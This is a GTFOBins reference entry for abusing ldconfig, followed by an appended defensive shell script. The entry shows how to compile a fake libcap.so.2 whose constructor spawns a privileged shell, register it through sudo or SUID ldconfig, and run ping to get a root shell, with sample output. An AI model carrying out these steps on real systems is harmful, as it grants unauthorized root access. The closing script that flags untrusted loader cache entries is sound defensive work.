GTFOBins.github.io/_gtfobins/ldconfig.md
Andrea Cardaci 391d436fc5 Add ldconfig
Close #68.
2019-08-14 13:14:57 +02:00

1.5 KiB

description

A minimal example of how to use the described technique follows (details may change across different distributions).

Run the code associated with the technique.

Identify a target SUID executable, for example the `libcap` library of `ping`:

```
$ ldd /bin/ping | grep libcap
    libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)
```

Create a fake library that spawns a shell at bootstrap:

```
echo '#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "/bin/sh", "-p", NULL);
}
' >"$TF/lib.c"
```

Compile it with:

```
gcc -fPIC -shared "$TF/lib.c" -o "$TF/libcap.so.2"
```

Run `ldconfig` again as described below, then just run `ping` to obtain a root shell:

```
$ ping
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)
```

functions

sudo

This allows overriding one or more shared libraries. Beware, though, that it is easy to *break* the target and other binaries.

```
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries into $TF
sudo ldconfig -f "$TF/conf"
```

limited-suid

This allows overriding one or more shared libraries. Beware, though, that it is easy to *break* the target and other binaries.

```
TF=$(mktemp -d)
echo "$TF" > "$TF/conf"
# move malicious libraries into $TF
./ldconfig -f "$TF/conf"
```
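
A defender-side check for the override described above, as an added example that is not part of the GTFOBins entry: it parses `ldconfig -p` output and reports loader cache entries that resolve outside standard library directories. The function names, the trusted-directory list and the sample cache listing are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit the dynamic loader cache for libraries resolved from
# directories outside the usual system locations.

# Assumption: directories treated as legitimate; adjust for the distribution.
TRUSTED_LIB_DIRS="/lib /lib32 /lib64 /libx32 /usr/lib /usr/lib32 /usr/lib64 /usr/libx32 /usr/local/lib"

# Reads `ldconfig -p` style lines on stdin and prints "soname<TAB>path" for each
# entry whose path is not under a trusted directory. Returns 1 if any are found.
audit_ld_cache() {
    awk -v trusted="$TRUSTED_LIB_DIRS" '
        BEGIN { n = split(trusted, dirs, " ") }
        / => \// {
            soname = $1
            path = $0
            sub(/^.* => /, "", path)
            ok = 0
            for (i = 1; i <= n; i++)
                if (index(path, dirs[i] "/") == 1) { ok = 1; break }
            if (path ~ /\/\.\.\//) ok = 0   # "../" could escape a trusted prefix
            if (!ok) { printf "%s\t%s\n", soname, path; bad = 1 }
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Constructed sample in the format printed by `ldconfig -p`.
sample_cache() {
    cat <<'EOF'
3 libs found in cache `/etc/ld.so.cache'
    libcap.so.2 (libc6,x86-64) => /tmp/tmp.9qfoUyKaGu/libcap.so.2
    libc.so.6 (libc6,x86-64) => /lib/x86_64-linux-gnu/libc.so.6
    libz.so.1 (libc6,x86-64) => /usr/lib/x86_64-linux-gnu/libz.so.1
EOF
}

# Demo on the sample; on a live host use: ldconfig -p | audit_ld_cache
sample_cache | audit_ld_cache || echo "untrusted loader cache entries found" >&2
```

A flagged entry is a reason to review who may run `ldconfig` with elevated privileges and which configuration files have been passed to it with `-f`.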